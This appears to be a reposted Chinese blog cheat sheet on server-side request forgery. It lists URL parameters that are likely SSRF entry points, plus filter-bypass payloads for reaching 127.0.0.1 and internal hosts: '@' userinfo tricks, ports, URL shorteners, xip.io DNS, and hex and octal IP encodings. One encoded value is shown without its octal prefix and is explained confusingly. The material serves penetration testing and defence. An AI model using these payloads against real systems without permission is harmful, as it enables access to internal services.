从以下URL关键字中寻找SSRF漏洞:
[sourcecode language=”plain”]
share
wap
url
link
src
source
target
u
3g
display
sourceURl
imageURL
domain
…
[/sourcecode]
http://127.0.0.1/ 被过滤的时候,可以尝试一下几种方式:
1、@
[sourcecode language=”plain”]http://abc@127.0.0.1[/sourcecode]
2、添加端口号
[sourcecode language=”plain”]http://127.0.0.1:8080[/sourcecode]
3、短地址
[sourcecode language=”plain”]http://dwz.cn/11SMa[/sourcecode]
4、可以指向任意ip的域名:xip.io
[sourcecode language=”plain”]
10.0.0.1.xip.io 10.0.0.1
www.10.0.0.1.xip.io 10.0.0.1
mysite.10.0.0.1.xip.io 10.0.0.1
foo.bar.10.0.0.1.xip.io 10.0.0.1
[/sourcecode]
5、ip地址转换成进制来访问
[sourcecode language=”plain”]115.239.210.26 = 16373751032[/sourcecode]
首先把这四段数字给 转成 16 进制!结果:73 ef d2 1a 然后把 73efd21a 这十六进制一起转换成8进制!访问使用http://00+转换后十六进制
[sourcecode language=”plain”]115.239.210.26 = 0x73.0xef.0xd2.0x1a[/sourcecode]
八进制
[sourcecode language=”plain”]115.239.210.26 = 0163.0357.0322.0032[/sourcecode]
文章出处:Evi1cg’s blog
原文链接:https://evi1cg.me/archives/SSRF_Bypass.html














暂无评论内容